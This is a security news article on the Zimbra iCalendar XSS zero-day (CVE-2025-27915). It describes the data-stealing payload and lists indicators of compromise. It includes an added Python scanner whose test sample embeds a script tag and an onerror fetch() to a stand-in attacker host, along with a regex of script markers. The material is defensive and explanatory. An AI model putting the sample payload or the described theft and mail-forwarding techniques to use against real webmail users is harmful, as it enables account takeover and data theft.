Cyber Security News

Hackers Exploit Zimbra Vulnerability as 0-Day with Weaponized iCalendar Files

A zero-day vulnerability in the Zimbra Collaboration Suite (ZCS) was actively exploited in targeted attacks earlier in 2025.

The flaw, identified as CVE-2025-27915, is a stored cross-site scripting (XSS) vulnerability that attackers leveraged by sending weaponized iCalendar (.ICS) files to steal sensitive data from victims’ email accounts.

The attacks were first identified by StrikeReady, which began monitoring for unusually large iCalendar files that contained JavaScript.

One notable attack targeted Brazil’s military: an attacker operating from the IP address 193.29.58.37 spoofed the Libyan Navy’s Office of Protocol to deliver the then-unknown exploit.

The core of the issue lies in Zimbra’s Classic Web Client, which failed to properly sanitize HTML content carried inside iCalendar files. This allowed threat actors to embed malicious JavaScript in a .ICS attachment.

When a user opened an email containing the malicious calendar entry, the script would execute within the user’s active session.
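The hunting heuristic described above (unusually large .ICS files carrying JavaScript) can be turned into a simple attachment check. The following is an added example, not code from the article or from StrikeReady; the two calendar entries, the size limit and the marker patterns are constructed for illustration.

```python
import re

# Constructed sample calendar entries (not from the article): a benign invite
# and one whose HTML description embeds script content. The URL is a placeholder.
BENIGN_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "BEGIN:VEVENT",
    "UID:demo-1@example.invalid",
    "SUMMARY:Project sync",
    "DESCRIPTION:Weekly status call.",
    "END:VEVENT", "END:VCALENDAR",
])
SUSPICIOUS_ICS = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "BEGIN:VEVENT",
    "UID:demo-2@example.invalid",
    "SUMMARY:Invitation",
    "X-ALT-DESC;FMTTYPE=text/html:<html><body>Agenda<script>",
    " alert(1)</script><img src=x onerror=\"fetch('https://attacker.invalid')\">",
    " </body></html>",
    "END:VEVENT", "END:VCALENDAR",
])

# Script indicators: inline <script>, javascript: URLs, and on*= event handlers.
SCRIPT_MARKERS = re.compile(r"<script\b|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)

def unfold(ics_text: str) -> list:
    """Join RFC 5545 folded lines (continuations start with a space or tab),
    so a payload split across physical lines is inspected as one value."""
    lines = []
    for raw in ics_text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def scan_ics(ics_text: str, size_limit: int = 64 * 1024) -> dict:
    """Flag a calendar file that is unusually large (assumed 64 KiB limit)
    or that contains script markers in any property value."""
    size = len(ics_text.encode("utf-8"))
    hits = []
    for line in unfold(ics_text):
        prop, _, value = line.partition(":")
        if SCRIPT_MARKERS.search(value):
            hits.append(prop.split(";")[0].upper())  # property name without parameters
    return {"size": size, "oversized": size > size_limit, "script_fields": hits,
            "suspicious": size > size_limit or bool(hits)}
```

Run it on attachments pulled from the mail gateway quarantine; a hit on `script_fields` is the stronger signal, while `oversized` alone is only a prompt for manual review.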

Although XSS vulnerabilities are often considered less severe than remote code execution (RCE) flaws, this one proved highly effective.

It enabled attackers to run arbitrary JavaScript in the victim’s authenticated webmail session and perform unauthorized actions, including data exfiltration and session hijacking, without the user’s knowledge.

Zimbra addressed the vulnerability on January 27, 2025, by releasing patches (versions 9.0.0 P44, 10.0.13, and 10.1.5), though evidence shows the exploit was used before the fix was available.

A Comprehensive Data-Stealing Payload

The JavaScript payload delivered through the exploit is a sophisticated data stealer designed specifically for Zimbra webmail. Its capabilities include:

  • Credential Theft: It creates hidden form fields to capture usernames and passwords from login pages.
  • Data Exfiltration: The script is programmed to steal a wide array of information, including emails, contacts, distribution lists, shared folders, scratch codes, and trusted device information. The stolen data is sent to an attacker-controlled server at https://ffrk.net/apache2_config_default_51_2_1.
  • Activity Monitoring: It monitors user activity and, if a user is inactive, triggers data theft before logging them out.
  • Email Forwarding: The malware adds a malicious email filter rule named “Correo” to automatically forward the victim’s emails to an external address, spam_to_junk@proton.me.
  • Evasion Techniques: To avoid detection, the script employs a 60-second delay before execution, limits its execution to once every three days, and hides user interface elements to conceal its activity.

While direct attribution remains unconfirmed, researchers note that the tactics resemble those used by a prolific Russian-linked threat actor and by UNC1151, a group that has been linked to the Belarusian government.

This incident underscores the significant threat posed by XSS vulnerabilities in enterprise environments and the importance of applying security patches promptly.


Guru Baran

Gurubaran is the Co-Founder and Editor-in-Chief of CyberSecurityNews.com, specializing in vulnerability analysis, malware research, ransomware, and computer forensics.
